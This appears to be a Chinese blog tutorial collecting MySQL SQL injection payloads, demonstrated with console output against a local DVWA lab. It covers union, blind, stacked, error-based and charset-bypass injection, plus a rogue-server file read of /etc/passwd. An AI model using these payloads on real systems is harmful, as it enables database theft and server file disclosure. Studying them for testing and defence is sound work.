vlambda博客
学习文章列表

SQL注入姿势-Mysql注入技巧

本文来自“白帽子社区知识星球”



白帽子社区知识星球

加入星球,共同进步

自己通过打比赛和平日的文章学习收集到的一些注入技巧,希望对大家有用

0 1

环境配置
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.7.26 |
+-----------+
1 row in set (0.00 sec)
mysql> use dvwa;
Database changed
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.00 sec)
mysql> select * from users;
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password
| avatar | last_login | failed_login |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-
03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb |
e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-
03 19:28:04 | 0| 3 | Hack | Me | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg | 2021-05-
03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg | 2021-05-
03 19:28:04 | 0 |
| 5 | Bob | Smith | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg | 2021-05-
03 19:28:04 | 0 |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)

0 2

绕过information_schema


常用注入 

information_schema 

sys schema 

innodb


information_schema


# 爆数据库名:
1' union select 1,database(),3#
# 1' union select schema_name from information_schema.schemata#
# 爆表名:
1' union select 1,group_concat(table_name),3 from information_schema.tables
where table_schema="dvwa"#
# 爆列名:
1' union select 1,group_concat(column_name),3 from information_schema.columns
where table_name="users" #
# 读数据:
1' union select 1,password,3 from users#
# group_concat(column_name) 可替换为 unhex(Hex(cast(column_name as
char)))column_name
# select 1,2,3,unhex(Hex(cast(column_name as char)))column_name from
information_schema.columns where table_name="users";
# group_concat 可替换为 concat_ws(',',id,users,password )


sys schemma


MySQL5.7的新特性


sys.schema_table_statistics_with_buffer


mysql> select table_schema from sys.x$schema_table_statistics_with_buffer;
+--------------+
| table_schema |
+--------------+
| dvwa |
| dvwa |
| zzcms |
+--------------+
3 rows in set (0.05 sec)
mysql> select table_name from sys.x$schema_table_statistics_with_buffer where
table_schema='dvwa';
+------------+
| table_name |
+------------+
| users |
| guestbook |
+------------+
2 rows in set (0.04 sec)
mysql> select password from users;
+----------------------------------+
| password |
+----------------------------------+
| 5f4dcc3b5aa765d61d8327deb882cf99 |
| e99a18c428cb38d5f260853678922e03 |
| 8d3533d75ae2c3966d7e0d4fcc69216b |
| 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
+----------------------------------+
5 rows in set (0.00 sec)


在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名


//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where
object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE
object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA =
DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE
TABLE_SCHEMA = DATABASE();
//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA =
DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE
TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE
TABLE_SCHEMA = DATABASE();
//通过表文件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP
DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP
DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP
DATABASE();


包含之前查询记录的表


SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();


performance_schema


SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type`
WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE
object_schema = DATABASE();
SELECT object_name FROM
`performance_schema`.`table_io_waits_summary_by_index_usage` WHERE
object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table`
WHERE object_schema = DATABASE();
SELECT object_name FROM
`performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema =
DATABASE();


包含之前查询记录的表


SELECT digest_text FROM
`performance_schema`.`events_statements_summary_by_digest` WHERE digest_text
REGEXP DATABASE();


包含表文件路径的表


# SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name
REGEXP DATABASE();
mysql> SELECT file_name FROM `performance_schema`.`file_instances` WHERE
file_name REGEXP DATABASE();
+-------------------------------------------------------------------------+
| file_name |
+-------------------------------------------------------------------------+
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\db.opt |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.frm |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.MYI |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\users.MYD |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.frm |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.MYI |
| D:\phpStudy\phpstudy_pro\Extensions\MySQL5.7.26\data\dvwa\guestbook.MYD |
+-------------------------------------------------------------------------+
7 rows in set (0.00 sec



innodb


Mysql>5.6.x 

Mysql默认是关闭InnoDB存储引擎


mysql> select table_name from mysql.innodb_table_stats where database_name =
'dvwa';
mysql> select table_name from mysql.innodb_index_stats where database_name =
'dvwa';


0 3

mysql无列名注入
mysql> select 1,2,3,4,5,6,7,8 union select * from users;
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
| 1 | 2 | 3 | 4 | 5 | 6
| 7
| 8 |
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
| 1 | 2 | 3 | 4 | 5 | 6
| 7
| 8 |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
/dvwa/hackable/users/admin.jpg | 2021-05-03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 |
/dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b |
/dvwa/hackable/users/1337.jpg | 2021-05-03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
/dvwa/hackable/users/pablo.jpg | 2021-05-03 19:28:04 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |
/dvwa/hackable/users/smithy.jpg | 2021-05-03 19:28:04 | 0 |
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
6 rows in set (0.00 sec)
mysql> select `3` from (select 1,2,3,4,5,6,7,8 union select * from users)a;
+---------+
| 3 |
+---------+
| 3 |
| admin |
| Brown |
| Me |
| Picasso |
| Smith |
+---------+
6 rows in set (0.00 sec)
mysql> select b from (select 1,2,3 as b,4,5,6,7,8 union select * from users)a;
+---------+
| b |
+---------+
| 3 |
| admin |
| Brown |
| Me |
| Picasso |
| Smith |
+---------+
6 rows in set (0.00 sec)
mysql> select concat(b,'~',c) from (select 1,2,3 as b,4,5 as c,6,7,8 union
select * from users)a;
+------------------------------------------+
| concat(b,'~',c) |
+------------------------------------------+
| 3~5 |
| admin~5f4dcc3b5aa765d61d8327deb882cf99 |
| Brown~e99a18c428cb38d5f260853678922e03 |
| Me~8d3533d75ae2c3966d7e0d4fcc69216b |
| Picasso~0d107d09f5bbe40cade3de5c71e9e9b7 |
| Smith~5f4dcc3b5aa765d61d8327deb882cf99 |
+------------------------------------------+
6 rows in set (0.00 sec)
############################################
mysql> select (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,
(select 6)f,(select 7)g,(select 8)h;
+---+---+---+---+---+---+---+---+
| a | b | c | d | e | f | g | h |
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select
5)e,(select 6)f,(select 7)g,(select 8)h;
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
+---+---+---+---+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select
5)e,(select 6)f,(select 7)g,(select 8)h union select * from users;
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
| 1 | 2 | 3 | 4 | 5 | 6
| 7
| 8 |
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
| 1 | 2 | 3 | 4 | 5 | 6
| 7
| 8 |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
/dvwa/hackable/users/admin.jpg | 2021-05-03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 |
/dvwa/hackable/users/gordonb.jpg | 2021-05-03 19:28:04 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b |
/dvwa/hackable/users/1337.jpg | 2021-05-03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
/dvwa/hackable/users/pablo.jpg | 2021-05-03 19:28:04 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |
/dvwa/hackable/users/smithy.jpg | 2021-05-03 19:28:04 | 0 |
+---+--------+---------+---------+----------------------------------+---------
-------------------------+---------------------+------+
6 rows in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c,
(select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select *
from users)k;
+----------------------------------+
| 5 |
+----------------------------------+
| 5 |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
| e99a18c428cb38d5f260853678922e03 |
| 8d3533d75ae2c3966d7e0d4fcc69216b |
| 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5f4dcc3b5aa765d61d8327deb882cf99 |
+----------------------------------+
6 rows in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c,
(select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select *
from users)k limit 3,1;
+----------------------------------+
| 5 |
+----------------------------------+
| 8d3533d75ae2c3966d7e0d4fcc69216b |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select k.5 from (select * from (select 1)a,(select 2)b,(select 3)c,
(select 4)d,(select 5)e,(select 6)f,(select 7)g,(select 8)h union select *
from users)k limit 1 offset 3;
+----------------------------------+
| 5 |
+----------------------------------+
| 8d3533d75ae2c3966d7e0d4fcc69216b |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id=1 union select (select k.5 from
(select * from (select 1)a,(select 2)b,(select 3)c, (select 4)d,(select 5)e,
(select 6)f,(select 7)g,(select 8)h union select * from users)k limit 1 offset
3)i,(select 2)o,(select 3)u,(select 4)y,(select 5)t,(select 6)r,(select 7)w,
(select 8)q;
+----------------------------------+------------+-----------+-------+---------
-------------------------+--------------------------------+-------------------
--+--------------+
| user_id | first_name | last_name | user | password
| avatar
| last_login | failed_login |
+----------------------------------+------------+-----------+-------+---------
-------------------------+--------------------------------+-------------------
--+--------------+
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-03
19:28:04 | 0 |
| 8d3533d75ae2c3966d7e0d4fcc69216b | 2 | 3 | 4 | 5
| 6
| 7 | 8 |
+----------------------------------+------------+-----------+-------+---------
-------------------------+--------------------------------+-------------------
--+--------------+
2 rows in set (0.00 sec)


0 4

利用order by盲注

ORDER BY 语句用于根据指定的列对结果集进行排序。ORDER BY 语句默认按照升序 对记录进行排序。


order by rand(True)和order by rand(False)的结果排序是不同的。


# order by rand(database()='dvwa')
mysql> select * from users order by rand(true);
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password
| avatar | last_login | failed_login |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| 5 | Bob | Smith | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg | 2021-05-
03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg | 2021-05-
03 19:28:04 | 0 |
| 3 | Hack | Me | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg | 2021-05-
03 19:28:04 | 0 |
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-
03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb |
e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-
03 19:28:04 | 0 |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
mysql> select * from users order by rand(false);
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password
| avatar | last_login | failed_login |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-
03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg | 2021-05-
03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb |
e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-
03 19:28:04 | 0 |
| 3 | Hack | Me | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg | 2021-05-
03 19:28:04 | 0 |
| 5 | Bob | Smith | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg | 2021-05-
03 19:28:04 | 0 |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)


利用指定列排序的差异来盲注


mysql> select user_id,password from users where user_id=1;
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'4'
order by 2;
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 4 |
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'6'
order by 2;
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 6 |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'5e'
order by 2;
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 5e |
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
2 rows in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 union select 1,'5g'
order by 2;
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 5g |
+---------+----------------------------------+
2 rows in set (0.00 sec)


0 5

堆叠注入
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| mysql |
| performance_schema |
| seacms |
| sys |
| thinkcmf |
| wellcms |
| xxl-job |
| zzcms |
+--------------------+
10 rows in set (0.00 sec)
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.00 sec)
mysql> show columns from users;
+--------------+-------------+------+-----+-------------------+---------------
--------------+
| Field | Type | Null | Key | Default | Extra
|
+--------------+-------------+------+-----+-------------------+---------------
--------------+
| user_id | int(6) | NO | PRI | NULL |
|
| first_name | varchar(15) | YES | | NULL |
|
| last_name | varchar(15) | YES | | NULL |
|| user | varchar(15) | YES | | NULL |
|
| password | varchar(32) | YES | | NULL |
|
| avatar | varchar(70) | YES | | NULL |
|
| last_login | timestamp | NO | | CURRENT_TIMESTAMP | on update
CURRENT_TIMESTAMP |
| failed_login | int(3) | YES | | NULL |
|
+--------------+-------------+------+-----+-------------------+---------------
--------------+
8 rows in set (0.00 sec)


预处理


mysql> select user_id,first_name,password from users;
+---------+------------+----------------------------------+
| user_id | first_name | password |
+---------+------------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | Gordon | e99a18c428cb38d5f260853678922e03 |
| 3 | Hack | 8d3533d75ae2c3966d7e0d4fcc69216b |
| 4 | Pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5 | Bob | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+------------+----------------------------------+
5 rows in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=3;
+---------+------------+----------------------------------+
| user_id | first_name | password |
+---------+------------+----------------------------------+
| 3 | Hack | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=3;SET
@sql=CONCAT('se','lect * from `users`;');PREPAR
E exp from @sql;EXECUTE exp;#
+---------+------------+----------------------------------+
| user_id | first_name | password |
+---------+------------+----------------------------------+
| 3 | Hack | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
Statement prepared
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password
| avatar | last_login | failed_login |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
| 1 | admin | admin | admin |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/admin.jpg | 2021-05-
03 19:28:04 | 0 |
| 2 | Gordon | Brown | gordonb |
e99a18c428cb38d5f260853678922e03 | /dvwa/hackable/users/gordonb.jpg | 2021-05-
03 19:28:04 | 0 |
| 3 | Hack | Me | 1337 |
8d3533d75ae2c3966d7e0d4fcc69216b | /dvwa/hackable/users/1337.jpg | 2021-05-
03 19:28:04 | 0 |
| 4 | Pablo | Picasso | pablo |
0d107d09f5bbe40cade3de5c71e9e9b7 | /dvwa/hackable/users/pablo.jpg | 2021-05-
03 19:28:04 | 0 |
| 5 | Bob | Smith | smithy |
5f4dcc3b5aa765d61d8327deb882cf99 | /dvwa/hackable/users/smithy.jpg | 2021-05-
03 19:28:04 | 0 |
+---------+------------+-----------+---------+--------------------------------
--+----------------------------------+---------------------+--------------+
5 rows in set (0.00 sec)


handler查询


mysql> select user_id,first_name,password from users where user_id=3;handler
`users` open;handler `users` read first;#
+---------+------------+----------------------------------+
| user_id | first_name | password |
+---------+------------+----------------------------------+
| 3 | Hack | 8d3533d75ae2c3966d7e0d4fcc69216b |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
+---------+------------+-----------+-------+----------------------------------
+--------------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password
| avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------
+--------------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99
| /dvwa/hackable/users/admin.jpg | 2021-05-03 19:28:04 | 0 |
+---------+------------+-----------+-------+----------------------------------
+--------------------------------+---------------------+--------------+
1 row in set (0.00 sec)


修改表结构


# 将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是
它少了一个id列,可以将flag字段改为id
1';
rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#


0 6

时间盲注


1. sleep(x) 

2. benchmark() 

3. select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C 

4. get_lock 5. rlike+rpad


07

MYSQL8.0注入新特性


  1. TABLE和SELECT有类似的功能

  2. 2. values可以构造一个表


08

Mysql字符编码特性


默认情况下,Mysql的字符集是 latin1 

Mysql字段的字符集和php mysqli客户端设置的字符集不相同时可能存在漏洞, 如 set names utf8;


此时可利用 Â 等latin1字符来绕过php的判断 


传入的 username=admin%c2 ,php的检测 if ($username === 'admin') 自然就可以绕 过的,在mysql中可以正常查出 username='admin' 的结果。 


Mysql在转换字符集的时候,将不完整的字符给忽略了


09

MySQL与报错注入


使用别名的时候,表中不能出现相同的字段名,利用join把表扩充成两份,在最后别 名c的时候查询到重复字段,成功报出字段名。 再利用using爆其他字段。


mysql> select user_id,first_name,password from users where user_id=1;
+---------+------------+----------------------------------+
| user_id | first_name | password |
+---------+------------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+------------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name,password from users where user_id=1 and
(select * from (select * from users as a join users as b) as c);
ERROR 1060 (42S21): Duplicate column name 'user_id'
mysql> select user_id,first_name,password from users where user_id=1 and
(select * from (select * from users as a join users as b using(user_id)) as
c);
ERROR 1060 (42S21): Duplicate column name 'first_name'
mysql> select user_id,first_name,password from users where user_id=1 and
(select * from (select * from users as a join users as b using(user_id,
first_name)) as c);
ERROR 1060 (42S21): Duplicate column name 'last_name'

mysql> select user_id,first_name,password from users where user_id=1 and
(select * from (select * from users as a join users as b using(user_id,
first_name, last_name)) as c);
ERROR 1060 (42S21): Duplicate column name 'user'



Polygon(1)


Polygon(1) 会爆错,如果传入的是存在的字段的话,就会爆出已知库、表、列。


mysql> select user_id,first_name,password from users where user_id=1 and
Polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select user_id,first_name,password from users where user_id=1 and
Polygon(user_id);
ERROR 1367 (22007): Illegal non geometric '`dvwa`.`users`.`user_id`' value
found during parsing


一个库中存在不同的系统或自定义函数,如果函数不存在会爆出这个库没有此函数


mysql> select user_id,first_name,password from users where user_id=1-a();
ERROR 1305 (42000): FUNCTION dvwa.a does not exist



10

ascii位偏移与盲注
mysql> select (select 'b') > (select 'flag');
+--------------------------------+
| (select 'b') > (select 'flag') |
+--------------------------------+
| 0 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'g') > (select 'flag');
+--------------------------------+
| (select 'g') > (select 'flag') |
+--------------------------------+
| 1 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'fa') > (select 'flag');
+---------------------------------+
| (select 'fa') > (select 'flag') |
+---------------------------------+
| 0 |
+---------------------------------+
1 row in set (0.00 sec)
mysql> select (select 'fl') > (select 'flag');
+---------------------------------+
| (select 'fl') > (select 'flag') |
+---------------------------------+
| 0 |
+---------------------------------+
1 row in set (0.00 sec)
mysql> select password from users limit 1,1;
+----------------------------------+
| password |
+----------------------------------+
| e99a18c428cb38d5f260853678922e03 |
+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,first_name from users where user_id=1 and (select
(select 'e99a1')) > (select password from users limit 1,1);
Empty set (0.00 sec)
mysql> select user_id,first_name from users where user_id=1 and (select
(select 'e99a19')) > (select password from users limit 1,1);
+---------+------------+
| user_id | first_name |
+---------+------------+
| 1 | admin |
+---------+------------+
1 row in set (0.00 sec)



11

REGEXP盲注
mysql> select password from users limit 1,1;
+----------------------------------+
| password |
+----------------------------------+
| e99a18c428cb38d5f260853678922e03 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select (select password from users limit 1,1) regexp '^e';
+----------------------------------------------------+
| (select password from users limit 1,1) regexp '^e' |
+----------------------------------------------------+
| 1 |
+----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '^e9';
+-----------------------------------------------------+
| (select password from users limit 1,1) regexp '^e9' |
+-----------------------------------------------------+
| 1 |
+-----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '^e98';
+------------------------------------------------------+
| (select password from users limit 1,1) regexp '^e98' |
+------------------------------------------------------+
| 0 |
+------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '3$';
+----------------------------------------------------+
| (select password from users limit 1,1) regexp '3$' |
+----------------------------------------------------+
| 1 |
+----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp '03$';
+-----------------------------------------------------+
| (select password from users limit 1,1) regexp '03$' |
+-----------------------------------------------------+
| 1 |
+-----------------------------------------------------+
1 row in set (0.00 sec)
mysql> select (select password from users limit 1,1) regexp 'f03$';
+------------------------------------------------------+
| (select password from users limit 1,1) regexp 'f03$' |
+------------------------------------------------------+
| 0 |
+------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 and (select password
from users limit 1,1) regexp '^e';
+---------+----------------------------------+
| user_id | password |
+---------+----------------------------------+
| 1 | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
1 row in set (0.00 sec)
mysql> select user_id,password from users where user_id=1 and (select password
from users limit 1,1) regexp '^e8';
Empty set (0.00 sec)



12

MySQL任意文件读取

攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。攻击 者就可以任意读取受害者的文件内容。主要是利用LOAD DATA INFILE这个语法去读取 一个文件的内容并且放到一个表中。


load datalocalinfile "/etc/passwd" into table TestTable


1.配合网站的重装漏洞进行利用读取服务器的任意文件。 

2.数据迁移等需要连接外部数据的功能点 

3.搭建在蜜罐上读取攻击者的信息。

工具 python2 https://github.com/allyshka/Rogue-MySql-Server


如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。